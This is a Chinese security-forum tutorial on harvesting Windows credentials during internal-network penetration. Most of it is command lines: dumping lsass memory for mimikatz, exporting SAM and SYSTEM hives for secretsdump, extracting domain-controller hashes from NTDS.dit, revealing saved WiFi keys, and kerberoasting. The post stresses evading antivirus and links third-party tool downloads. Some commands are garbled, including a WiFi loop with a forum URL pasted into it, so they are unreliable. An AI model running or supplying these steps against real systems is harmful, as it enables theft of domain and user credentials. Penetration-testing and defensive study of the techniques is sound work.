用户
搜索
  • TA的每日心情
    开心
    2021-9-15 16:02
  • 签到天数: 2 天

    连续签到: 1 天

    [LV.1]初来乍到

    i春秋-呆萌菜鸟

    Rank: 1

    3

    主题

    4

    帖子

    57

    魔法币
    收听
    0
    粉丝
    0
    注册时间
    2021-4-15
    发表于 2021-8-5 21:39:27 02724
    本帖最后由 未来fish 于 2021-8-6 16:20 编辑

    内网渗透---明文和hash的获取

    本篇文章作者未来fish,本篇文章参与i春秋作家连载计划所属从0到1团队,未经许可禁止转载。连载方向:内网安全,web安全

    目录

    1.内网渗透-------------------内网信息收集
    2.内网渗透-------------------明文和hash的获取
    3.内网渗透-------------------内网横向渗透

    利用Procdump+mimikatz配合获取hash与明文

    Procdump是微软官方发布的工具,可以绕过大多数的防护软件使用该工具,procdump.exe把进程lsass.exe 的内存dump下来,而在使用mimikatz时很有可能被查杀,所以先使用procdump工具,将获取的lsass.dmp拷贝到本机上,再使用mimikatz获取hash与明文
    下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
    进程lsass.exe中存在密码信息,使用Procdump获取lsass.dmp

    procdump -accepteula -ma lsass.exe lsass.dmp


    将lsass.dmp导出到本机后,使用mimikatz获取明文密码,这样就可以不用将mimikatz传入到目标机中,可以绕过大多数防护软件。
    privilege::debug 提升权限
    sekurlsa::minidump lsass.dmp 用mimikatz载入lsass.dmp
    sekurlsa::logonPasswords full   获取明文密码和hash

    利用secretsdump获取明文密码

    SAM(安全账户管理器),SAM存放在注册表中,SAM用来存储Windows操作系统密码的数据库文件,为了避免明文密码泄露,SAM文件中保存的是明文密码经过一系列算法处理过的Hash值,被保存的Hash分为LM Hash(已废弃)和NTLMHash(长度32bit由字母数字组成)。,现在用户凭证是以NTLM HASH形式保存。在用户在本地或者远程登陆系统时,会将Hash值与SAM文件中保存的Hash值进行对比。在后期的Windows系统中,SAM文件中被保存的密码Hash都被密钥SYSKEY加密。
    使用该方法的好处:可以不用在目标主机上上传任何的文件,只需要将湖区的文件导出到自己本机进行处理,可以绕过防护软件
    首先利用注册表命令将目标机的sam或者system文件导出
    reg save hklm\sam C:\sam.save
    reg save hklm\security C:\security.save
    reg save hklm\system C:\system.save

    secretsdump获取明文密码
    将文件拷贝到我们自己的主机,这样可以不用在目标机上使用工具包,不用考虑免杀和环境问题,因为以上命令都是系统自带,使用secretsdump需要在python环境下,用impacket的 secretsdump脚本加载,在运行脚本时,需要将这些文件全部放在同一目录。并且需要先安装impacket模块,Python脚本才能正确运行。
    secretsdum下载地址:https://pan.baidu.com/s/17RuNdxdFmTUfRS50rZESRQ
    提取码:4534

    secretsdumps.py -sam sam.save -security security.save -system system.save LOCAL
    可以观察到各种数据库的密码显示出来

    NTDS.dit获取域控hash

    Windows系统为了保证用户明文密码不会被泄漏,将密码转换为HASH值进行身份验证,被保存在SAM或者ntds.dit中(mimitakz,procdump等等),域中的所有账号密码存放在Ntds.dit,如果拿到,相当于拿到整个域权限。这个思路在域渗透中尤为重要,因为这里面包含着所有域用户的hash,当然该思路只对DC生效。使用该方法不用担心被杀毒软件查杀,因为不需要上传任何工具去目标机上。
    手动导出NTDS.dit和System
    ntdsutil "ac i ntds" ifm "create full c:\users\tmp" q q

    提取用户hash,这里推荐使用NTDSDumpEx:
    下载地址:https://github.com/zcgonvh/NTDSDumpEx/releases
    NTDSDumpEx -d ntds.dit -s system -o domain.txt

    保存的hash

    利用系统自带命令获取WIFI密码

    使用系统自带命令不用担心杀毒软件查杀
    netsh wlan show profiles 系统命令获取登录过的WiFi名称

    netsh wlan show profile name="TP-LINK_5358" key=clear
    获取TP-LINK_5358中的WiFi密码
    通过如下命令获取连接过的wifi密码:
    for /f  "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles')  do  home.php?mod=space&uid=46675 %j | findstr -i -v echo |  netsh wlan show profiles %j key=clear


    利用WCE抓取hash
    Quarks PwDump 是开放源代码的 Windows 用户获取工具,这款工具是一款Hash注入神器,不仅可以用于Hash注入,也可以直接获取明文或Hash。这款工具也分为32位和64位两个不同的版本,它可以抓取windows平台下多种类型的用户凭据,包括:本地帐户、域帐户、缓存的域帐户和Bitlocker。但使用Quarks PwDump有可能被查杀,因为毕竟不是微软官方的工具,并且需要powershell环境。
    下载地址:https://pan.baidu.com/s/1JhI-ZWRC1O1_G2pb53KS1A
    提取码:dzgw
    http://code.google.com/p/quarkspwdump/(需要翻墙下载
    各个选项

    QuarksPwDump -dhl  获取本地的hash

    QuarksPwDump -dhdc  获取域内的hash值

    利用kerberoast+mimikatz配合获取明文密码

    SPN(服务主体名service principal name)是微软为了在域环境中方便管理资源而为每种资源分配设计的一种表示方法(或者说SPN是使用Kerberos身份验证的网络中唯一的标识符),凡是使用Kerberos身份验证的网络中,都必须在机器账号或用户账号下为服务注册SPN(每个使用Kerberos的服务都需要一个SPN)在内网中,SPN扫描通过查询向域控服务器执行服务发现。这对于红队而言,可以帮助他们识别正在运行重要服务的主机,如终端,交换机等。SPN的识别是kerberoasting攻击的第一步。
    使用该方法有两个缺点:1.需要powershell    2.mimikatz容易被杀毒软件查杀
    查看指定域ROOTKIT.ORG注册的SPN:setspn -T ROOTKIT.ORG -Q */* 如果指定域不存在,则默认切换到查找本域的SPN

    setspn -q */*    获取所有服务

    这里搜索MSSQL服务
    Setspn -q */* | findstr “MSSQL

    请求SPN
    Add-Type -AssemblyName System.IdentityModel
    New-Objec System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/Srv-Web-Kit.rootkit.org:1433"

    将票据导出
    kerberos::list /export


    查看所有的票据

    使用kerberoast获取明文密码
    kerberoast下载地址:https://github.com/nidem/kerberoast
    在运行时需要在python3以上的环境运行,不然会报错

    利用mimikatz获取明文和hash

    mimikatz https://github.com/gentilkiwi/mimikatz/releases/ 用于破解计算机中的账号密码

    发新帖
    您需要登录后才可以回帖 登录 | 立即注册